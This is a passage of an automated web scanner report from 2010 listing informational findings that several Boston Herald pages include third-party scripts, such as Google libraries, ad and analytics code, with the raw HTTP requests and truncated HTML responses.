Date: Mon, 08 Nov 2010 01:25:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.87. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.88. http://bostonherald.com/news/document.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/document.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 302 Found
Date: Mon, 08 Nov 2010 01:52:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Location: http://www.bostonherald.com/error.bg?error=Page%20Not%20Found
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.89. http://bostonherald.com/news/international/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/international/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:41:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.90. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:42:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.91. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:42:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.92. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=recent_bullet HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:43:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.93. http://bostonherald.com/news/international/asia_pacific/view/201011072_us_drone_strikes_kill_9_militants_in_nw_pakistan/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/asia_pacific/view/201011072_us_drone_strikes_kill_9_militants_in_nw_pakistan/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/asia_pacific/view/201011072_us_drone_strikes_kill_9_militants_in_nw_pakistan/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:43:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.94. http://bostonherald.com/news/international/asia_pacific/view/20101107indonesian_volcano_sparks_travel_chaos/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/asia_pacific/view/20101107indonesian_volcano_sparks_travel_chaos/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/asia_pacific/view/20101107indonesian_volcano_sparks_travel_chaos/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

